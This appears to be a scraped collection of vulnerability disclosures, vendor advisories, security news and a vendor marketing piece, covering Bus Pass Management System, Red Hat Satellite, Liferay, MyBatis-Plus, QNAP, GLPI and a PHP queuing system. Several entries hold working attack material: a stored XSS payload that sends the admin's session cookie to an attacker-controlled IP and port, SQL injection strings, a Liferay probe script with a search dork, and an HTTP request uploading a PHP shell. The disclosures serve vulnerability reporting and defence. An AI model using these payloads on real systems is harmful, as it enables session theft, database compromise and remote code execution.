Bus Pass Management System version 1.0 suffers persistent cross site scripting vulnerabilities.

    # Exploit Title: Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)# Date: 2021-09-17# Exploit Author: Matteo Conti - https://deltaspike.io# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Ubuntu 18.04 - LAMP# DescriptionThe application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie># Prof of concept:- From /contact.php, send a message containing the following payload in "title" or "message" fields:<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>(the first url have to be an existing image)- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php- Your listener will receive the PHP session id.

Bus Pass Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-1630-01 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. Issues addressed include an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Satellite 6.12.3 Async Security Update  
Advisory ID:       RHSA-2023:1630-01  
Product:           Red Hat Satellite 6  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1630  
Issue date:        2023-04-04  
CVE Names:         CVE-2022-41946   
=====================================================================

1. Summary:

Updated Satellite 6.12 packages that fixes important security bugs and  
several  
regular bugs are now available for Red Hat Satellite.

2. Relevant releases/architectures:

Red Hat Satellite 6.12 for RHEL 8 - noarch

3. Description:

Red Hat Satellite is a system management solution that allows organizations  
to configure and maintain their systems without the necessity to provide  
public Internet access to their servers or other client systems. It  
performs provisioning and configuration management of predefined standard  
operating environments.

Security fix(es):

* Candlepin: PreparedStatement.setText(int, InputStream) will create a  
temporary file if the InputStream is larger than 2k (CVE-2022-41946)

This update fixes the following bugs:

2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates  
not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object  
has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not  
find virtual machine network interface matching <IP>  
2174997 - Package and Errata actions on content hosts selected using the  
"select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot  
belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass"  
while syncing from quay.io  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE  
provisioning when boot_mode is static  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11   
2174995 - Health check should use hostname -f  
2175007 - [regression] data.yml is referring to old sync plain id which  
does not exist in katello_sync_plans  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by  
maintain as OK to interrupt  
2175010 - Some custom repositories are failing to synchorize with error  
"This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176922 - [RFE] Need syncable yum-format repository imports   
2175003  - Can't perform incremental content exports in syncable format 

Users of Red Hat Satellite are advised to upgrade to these updated  
packages, which fix these bugs.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not find virtual machine network interface matching <IP>  
2174995 - Health check should use hostname -f  
2174997 - Package and Errata actions on content hosts selected using the "select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass" while syncing from quay.io  
2175003 - Can't perform incremental content exports in syncable format  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE provisioning when boot_mode is static  
2175007 - [regression] data.yml is referring to old sync plain id which does not exist in katello_sync_plans  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11  
2175010 - Some custom repositories are failing to synchorize with error "This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by maintain as OK to interrupt  
2176922 - [RFE] Need syncable yum-format repository imports

6. Package List:

Red Hat Satellite 6.12 for RHEL 8:

Source:  
candlepin-4.1.20-1.el8sat.src.rpm  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
rubygem-katello-4.5.0.32-1.el8sat.src.rpm  
rubygem-optimist-3.0.1-1.el8sat.src.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
candlepin-4.1.20-1.el8sat.noarch.rpm  
candlepin-selinux-4.1.20-1.el8sat.noarch.rpm  
foreman-3.3.0.21-2.el8sat.noarch.rpm  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
foreman-dynflow-sidekiq-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ec2-3.3.0.21-2.el8sat.noarch.rpm  
foreman-gce-3.3.0.21-2.el8sat.noarch.rpm  
foreman-journald-3.3.0.21-2.el8sat.noarch.rpm  
foreman-libvirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-openstack-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ovirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-postgresql-3.3.0.21-2.el8sat.noarch.rpm  
foreman-service-3.3.0.21-2.el8sat.noarch.rpm  
foreman-telemetry-3.3.0.21-2.el8sat.noarch.rpm  
foreman-vmware-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
rubygem-katello-4.5.0.32-1.el8sat.noarch.rpm  
rubygem-optimist-3.0.1-1.el8sat.noarch.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.noarch.rpm  
satellite-6.12.3-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
satellite-capsule-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm

noarch:  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCyTXNzjgjWX9erEAQh57hAAknElDhu4y424D1I96zILtTXiJrw+50LC  
xD4Vj3M7gY44/6QgBg8H4YzfKZjdWGAX1byaDC6Wzb6RqtSnU7LCGI3PwA4+N3SY  
a0AidcKXV0LccwTDQcykzNC47KABGDShLFmXx5jGKn7LNWxrZRpSPk9G/jJ2tD4T  
/TaZQT20pxFXKs4vZvqXkjBDk0NXMT60fv128iXsloriajum1g3IcmJoB5R4tHFF  
bKp+sTWBVlOBwjN1qvXZ/A8JkvzKiyeMeVRM/sAoiFHNdaKFiUAsafebXTJJ55YC  
7zHqsAIO1MznhhHuW7xqE4cJb58HBYDA/Q7xD5NONFYJn+nMWe6wNgB7GOL2vNOR  
18wT35+BOjUnY0N1Ew9EllAeNOP2rHn9Rknvr9N3Z3WVzUU6Jsn4JyicdVi96xj7  
1G/Mwu2/I4fZE0SkLF3YUI1eB0akNa9lASZ/i29XbyL3HuYhDLkdQ2qrRrCWOHf3  
MxkYFoBaQlKLnWI21B1AkqIcxiqfQQ9CRECTTl86R3IZRnnV49IXrowSIAZJQy0r  
hY6n+5BcvGLpqDkyYelp4zaoCwnlSJRsXOJMBW5shF/9QfB1eWT7dU3bxnl+MPUO  
tZ0iUmZjbzBsjvgiQ22377jDuhdMk95lRgaRF8kdy13cavaykF5MA2hitfIiucL7  
pG8zVEKEY3A=  
=vuaR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1630-01

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

**Liferay Portal 6.2.5 Insecure Permissions**

Posted Apr 5, 2023

Authored by fu2x2000

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

tags | exploit

advisories | CVE-2021-33990

SHA-256 | e3e411dfd9f5109ca37b6290d45f0e2d70ef14dec30d730427fdf7979b0850b5

Download | Favorite | View

**Liferay Portal 6.2.5 Insecure Permissions**

    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/# Date: 2021/05# Exploit Author: fu2x2000# Version: Liferay Portal 6.2.5 or later# CVE : CVE-2021-33990 import requestsimport jsonprint (" Search this on Google #Dork for liferay-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")url ="URL Goes Here/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"req = requests.get(url)print reqsta = req.status_codeif sta == 200:print ('Life Vulnerability exists')cook = urlprint cookinject = "Command=FileUpload&Type=File&CurrentFolder=/"#cook_inject = cook+inject#print cook_injectelse:print ('not found try a another method')print ("solution restrict access and user groups")

**File Tags**

*   ActiveX (932)
*   Advisory (80,663)
*   Arbitrary (15,931)
*   BBS (2,859)
*   Bypass (1,655)
*   CGI (1,022)
*   Code Execution (7,067)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,307)
*   DoS (22,956)
*   Encryption (2,359)
*   Exploit (50,803)
*   File Inclusion (4,186)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,691)
*   Intrusion Detection (876)
*   Java (2,961)
*   JavaScript (831)
*   Kernel (6,471)
*   Local (14,314)
*   Magazine (586)
*   Overflow (12,549)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,505)
*   Python (1,488)
*   Remote (30,329)
*   Root (3,538)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,825)
*   Shell (3,138)
*   Shellcode (1,209)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,180)
*   TCP (2,385)
*   Trojan (687)
*   UDP (881)
*   Virus (663)
*   Vulnerability (31,400)
*   Web (9,473)
*   Whitepaper (3,740)
*   x86 (948)
*   XSS (17,599)
*   Other

**File Archives**

*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (372)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,715)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,194)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,962)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,470)
*   UNIX (9,209)
*   UnixWare (185)
*   Windows (6,534)
*   Other

Liferay Portal 6.2.5 Insecure Permissions

MyBatis-Plus below 3.5.3.1 is vulnerable to SQL injection via the tenant ID value. This may allow remote attackers to execute arbitrary SQL commands.

**MyBatis-Plus vulnerable to SQL injection via TenantPlugin**

High severity GitHub Reviewed Published Apr 5, 2023 to the GitHub Advisory Database • Updated Apr 5, 2023

GHSA-32qq-m9fh-f74w: MyBatis-Plus vulnerable to SQL injection via TenantPlugin

Multiple QNAP operating systems are affected, including QTS, QuTS hero, QuTScloud, and QVP Pro appliances, and some don't yet have patches available.

A pair of zero-day vulnerabilities in several Quality Network Appliance Provider (QNAP) operating systems (OS) for network-attached storage (NAS) appliances are impacting an estimated 80,000 devices worldwide. They remain unpatched for two of the four affected OSes.

QNAP provides gear and software for Internet of Things (IoT) storage, networking, and smart video. The OS bugs, discovered by researchers at Sternum, are memory access violations, which could cause unstable code and could provide a path for an authenticated cybercriminal to execute arbitrary code.

The vulnerabilities, tracked under CVE-2022-27597 and CVE-2022-27598, impact the QTS, QuTS hero, QuTScloud, and QVP OS, according to Sternum, and have been fixed in QTS version 5.0.1.2346 build 20230322 (and later) and QuTS hero version h5.0.1.2348 build 20230324 (and later). The QuTScloud and QVP OS remain unpatched, but QNAP said that it is "urgently fixing" the flaws.

    

Source: QNAP

Sternum researchers explain the memory access violations affect the performance, as well as the security of the QNAP devices.

"From a performance point of view, they could lead to stability issues and unpredictable code behavior," Sternum's director of security of research Amit Serper says. "From a security perspective, they can be used for arbitrary code execution by a malicious threat actor."

The QNAP security advisory adds, "If exploited, the vulnerability allows remote authenticated users to get secret values."

While the bugs are rated "low severity," and so far, Sternum's researchers have not seen them exploited in the wild, getting a patch in place quickly matters — QNAP users continue to be a favorite target among cybercriminals.

**Why Is QNAP Cyberattacker Catnip?**

The DeadBolt ransomware group in particular was seen exploiting a range of zero-day vulnerabilities in a series of wide-rangingcybercampaigns against QNAP users in 2022 alone, surfacing regularly in May, June, and September.

DeadBolt is clearly dead set, as it were, on putting effort into finding — and exploiting — QNAP flaws, preferably critical zero-days, according to Mark Parkin, senior technical engineer with Vulcan Cyber.

"It's sometimes said that finding one vulnerability in a target will lead people into looking for more," Parkin explains. "The issue here is that they are finding more as they look. It almost makes you wonder if the attackers don't have access to the source code, or some other way to get an inside track."

Collusion suspicions aside, it's up to organizations to make sure their highly targeted QNAP systems are up to date, especially given that new bugs are coming to light with some frequency. In addition to the most recent findings from Sternum, in February, users of QNAP QTS OS were alerted to a critical SQL injection issue with a CVSS score of 9.8. The disclosures just widen the attack surface further.

In the case of the most recent vulnerabilities, users with systems without a patch available should employ a strong endpoint detection and response (EDR) solution and look for indicators of compromise. Because cyberattackers would need to be authenticated, doing an audit of who has access to vulnerable systems and providing additional authentication protection could also help mitigate an attack.

One researcher warns that even in cases where patches are available, truly locking down the appliances might require a shift in mindset for some companies. 

"QNAP devices are very attractive to cybercriminals whose strategy is to ask a large number of victims for a small amount of money," Bud Broomhead, CEO of Viakoo says. "Because QNAP devices, along with many other IoT devices, are largely managed outside of IT, they are often misconfigured, left unprotected by a firewalls, and left unpatched."

He adds, "These devices often are invisible to corporate IT and security teams and do not get audited or observed when they fall out of compliance, such as by being on out-of-date and insecure firmware."

QNAP Zero-Days Leave 80K Devices Vulnerable to Cyberattack

GLPI is a free asset and IT management software package. Starting in version 0.83 and prior to versions 9.5.13 and 10.0.7, an authenticated user can modify emails of any user, and can therefore takeover another user account through the "forgotten password" feature. By modifying emails, the user can also receive sensitive data through GLPI notifications. Versions 9.5.13 and 10.0.7 contain a patch for this issue. As a workaround, account takeover can be prevented by deactivating all notifications related to `Forgotten password?` event. However, it will not prevent unauthorized modification of any user emails.

This release fixes several security issues that have been recently discovered. Update is recommended!

You can download the **GLPI 9.5.13 archive** on GitHub.

You will find below the list of security issues fixed in this bugfixes version:

*   \[SECURITY - High\] Account takeover by authenticated user (CVE-2023-28632).
*   \[SECURITY - High\] SQL injection through dynamic reports (CVE-2023-28838).
*   \[SECURITY - Moderate\] Stored XSS through dashboard administration (CVE-2023-28852).
*   \[SECURITY - Moderate\] Stored XSS on external links (CVE-2023-28636).
*   \[SECURITY - Moderate\] Reflected XSS in search pages (CVE-2023-28639).
*   \[SECURITY - Moderate\] Privilege Escalation from technician to super-admin (CVE-2023-28634).
*   \[SECURITY - Low\] Blind Server-Side Request Forgery (SSRF) in RSS feeds (CVE-2023-28633).

Regards.

CVE-2023-28632: Release 9.5.13 · glpi-project/glpi

A SQL injection vulnerability in Mybatis plus below 3.5.3.1 allows remote attackers to execute arbitrary SQL commands via the tenant ID valuer.

**MybatisPlusTenantPluginSQLInjection**

中文

**1\. Vulnerability Summary**

Threat: SQL Injection

MavenGroupId: com.baomidou

MavenArtifactId: mybatis-plus

AffectedVersion: 3.x

AffectedComponent: TenantPlugin

Description: The tenant plugin fails to handle the tenant ID value when constructing SQL expressions and directly concatenates it into the SQL expression. When the application has enabled the tenant plugin and the tenant ID is controllable by an external user, this can result in SQL injection.

Result：A successful SQL injection vulnerability can allow for sensitive data to be read from the database, modification of database data (insert/update/delete), execution of administrative operations on the database (such as shutting down the DBMS), recovery of content from files present in the DBMS file system and in certain cases, issuing commands to the operating system.

Prerequisites:

1.  The application has enabled the tenant plugin;
2.  The tenant ID is externally controllable and has been passed into the getTenantId method;
    *   (3.0.x, 3.1.x, 3.3.x) com.baomidou.mybatisplus.extension.plugins.tenant.TenantHandler#getTenantId
    *   (3.4.x, 3.5.x) com.baomidou.mybatisplus.extension.plugins.handler.TenantLineHandler#getTenantId
3.  The application has not filtered the tenant ID value.

**2\. Vulnerability Reproduction**

Test Version: 3.4.2

Refer to "https://github.com/baomidou/mybatis-plus-samples/tree/master/mybatis-plus-sample-tenant" to build a spring application and enable the tenant plugin:

com.example.demo.config.MybatisPlusConfig 

com.example.demo.common.TenantHolder 

Interface for testing: /user?tid= will returns a specified tenant data record.

com.example.demo.controller.HelloController 

db:

    CREATE TABLE `users` (  
      `id` int(32) NOT NULL AUTO_INCREMENT,  
      `name` varchar(32) NOT NULL,  
      `tenant_id` varchar(64) NOT NULL,  
      PRIMARY KEY (`id`)  
    ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
    

Test interface using blank parameters:

http://localhost:8080/user?tid= 

Use ' or 1=1 and '123'='123 to perform sql injection and get all the data 

**3\. Vulnerability Detail**

Test Version: 3.0.7.1

builderExpression:265, TenantSqlParser (com.baomidou.mybatisplus.extension.plugins.tenant) processPlainSelect:193, TenantSqlParser (com.baomidou.mybatisplus.extension.plugins.tenant) processPlainSelect:174, TenantSqlParser (com.baomidou.mybatisplus.extension.plugins.tenant) processSelectBody:75, TenantSqlParser (com.baomidou.mybatisplus.extension.plugins.tenant) processParser:96, AbstractJsqlParser (com.baomidou.mybatisplus.core.parser) parser:71, AbstractJsqlParser (com.baomidou.mybatisplus.core.parser) sqlParser:63, AbstractSqlParserHandler (com.baomidou.mybatisplus.extension.handlers) intercept:129, PaginationInterceptor (com.baomidou.mybatisplus.extension.plugins)

Test Version: 3.4.2

builderExpression:357, TenantLineInnerInterceptor (com.baomidou.mybatisplus.extension.plugins.inner) processPlainSelect:235, TenantLineInnerInterceptor (com.baomidou.mybatisplus.extension.plugins.inner) processSelectBody:100, TenantLineInnerInterceptor (com.baomidou.mybatisplus.extension.plugins.inner) processSelect:88, TenantLineInnerInterceptor (com.baomidou.mybatisplus.extension.plugins.inner) processParser:91, JsqlParserSupport (com.baomidou.mybatisplus.extension.parser) parserSingle:50, JsqlParserSupport (com.baomidou.mybatisplus.extension.parser) beforeQuery:70, TenantLineInnerInterceptor (com.baomidou.mybatisplus.extension.plugins.inner) intercept:78, MybatisPlusInterceptor (com.baomidou.mybatisplus.extension.plugins)

**4\. Restoration Suggestions**

It is unlikely that this vulnerability will be fixed, so if you are using the MybatisPlus tenant plugin and the tenant id is externally controllable, please do your own filtering, checking, etc. as appropriate for your system.

CVE-2023-25330: MybatisPlusTenantPluginSQLInjection-POC/Readme.en.md at master · FCncdn/MybatisPlusTenantPluginSQLInjection-POC

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter at /admin/ajax.php?action=login.

Permalink

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

BUG\_Author: ctg503 team

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=login

Vulnerability location: /queuing/admin/ajax.php?action=login, name

dbname =queuing\_db

\[+\] Payload: username=admin' and sleep(5)--+&password=admin // Leak place ---> name

POST /queuing/admin/ajax.php?action\=login HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
username=admin' and sleep(5)--+&password=admin

CVE-2023-26856: bug_report/SQLi-1.md at main · ctg503/bug_report

An arbitrary file upload vulnerability in /admin/ajax.php?action=save_uploads of Dynamic Transaction Queuing System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Dynamic Transaction Queuing System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: ctg503 team

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin/admin123 (Super Admin account)

Vulnerability url: ip/queuing/admin/ajax.php?action=save\_uploads

Loophole location: Dynamic Transaction Queuing System's "/queuing/admin/ajax.php?action=save\_uploads" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /queuing/admin/ajax.php?action\=save\_uploads HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/queuing/admin/index.php?page=uploads
Content-Length: 396
Content-Type: multipart/form-data; boundary=---------------------------208633099825036
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
\-----------------------------208633099825036
Content-Disposition: form-data; name="id"
\-----------------------------208633099825036
Content-Disposition: form-data; name="img\[\]"
data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
\-----------------------------208633099825036
Content-Disposition: form-data; name="imgName\[\]"
shell.php
\-----------------------------208633099825036--

The files will be uploaded to this directory \\queuing\\admin\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-26857: bug_report/RCE-1.md at main · ctg503/bug_report

Every year hundreds of millions of malware attacks occur worldwide, and every year businesses deal with the impact of viruses, worms, keyloggers, and ransomware. Malware is a pernicious threat and the biggest driver for businesses to look for cybersecurity solutions. 
Naturally, businesses want to find products that will stop malware in its tracks, and so they search for solutions to do that.

Every year hundreds of millions of malware attacks occur worldwide, and every year businesses deal with the impact of viruses, worms, keyloggers, and ransomware. Malware is a pernicious threat and the biggest driver for businesses to look for cybersecurity solutions.

Naturally, businesses want to find products that will stop malware in its tracks, and so they search for solutions to do that. But **malware protection** alone is not enough, instead what's needed is a more holistic approach. Businesses need to defend against malware entering the network, and then on top of that have systems and processes in place to restrict the damage that malware can do if it infects a user device.

This approach will not only help stop and mitigate the damage from malware, but defend against other types of threats too, such as credential theft as a result of phishing, insider threats, and supply-chain attacks.

**Element 1: Malware Protection and Web Filtering**

The first and most sensible place to begin is with anti-malware solutions. It's important to look for malware solutions that can confront today's key threats, such as known malware, polymorphic variants, ransomware, zero-day exploits, and Advanced Persistent Threats (APTs). This requires a strong toolkit of virus signature databases, virtual code execution, as well as heuristics and other machine learning techniques.

Ideally, you would also use malware protection for both the network and the endpoint. This requires two different solutions, but a multi-layered approach means less chance of something getting through.

In addition to Malware Protection, Web Filtering keeps your employees away from potential threats by disallowing known malicious sites, questionable sites, and other places online you'd rather not have managed devices visit.

**Element 2: Zero Trust Network Access**

Every security strategy in a modern network environment should embrace the principles of Zero Trust. The most practical implementation of which is **Zero Trust Network Access (ZTNA)**.

Zero Trust itself is a set of ideas about security based on the idea "never trust, always verify." That is, no one should be allowed to just login to the network and stay as long as they like. Because if you do that, you can never really know whether or not the user logging in is who they claim to be, or if they're a threat actor who obtained a legitimate user's login credentials.

Instead, each user should only be allowed to access resources they need to do their job, and not to every cloud resource or on-prem server in the company. An HR employee, for example, has no practical reason to access a company Git server containing a codebase, or an SQL database containing sensitive customer information. So the network should, by default, group HR employees together into one group and disallow them from accessing that information.

This approach goes for every department. Only the resources they need to do their jobs should be available, while access to everything else is disallowed.

Segmenting access at the application level isn't quite enough to qualify as Zero Trust, however. In fact, this level of restricting access, known as micro-segmentation, is just one part of the Zero Trust approach.

A full ZTNA implementation also embraces context checks that can involve the security status of a managed device, time-based access rules, and geographic requirements.

You might, for example, require that managed devices must be running a specific minimum version of Windows or macOS. You could require that all devices have a specific antivirus solution running, or that a specific security certificate is installed somewhere on the device.

Micro-segmentation, allowing specific people to access specific applications, in conjunction with context-based authentication rules provides a complete Zero Trust approach.

In addition, there should be access rules not only for users on managed devices, but also on unmanaged devices. The latter are best handled by Agentless ZTNA solutions where people access individual applications through a web portal that is not discoverable over the open Internet. Here, too, you can apply context rules such as allowing access only during certain times of day, or disallowing access based on location.

With a ZTNA strategy in place, it will be much harder for threat actors to traverse a business network in search of sensitive data. Ransomware will have a much harder time encrypting all of a business' files, and disgruntled employees won't be able to exfiltrate as much data or cause other mayhem within the company.

**Fight Malware and Protect the Network From the Cloud**

All of these tools and technologies: ZTNA, Malware Protection, and **Web Filtering** are best served as part of a cloud-based, converged network security solution like **Perimeter 81**. Being cloud-based means there's no hardware to maintain or upgrade, and scalability is much simpler. Plus, a converged solution means you can manage everything from a single dashboard for full visibility.

With a converged security solution to help manage your network and network security you'll be off to a great start protecting your business.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#sql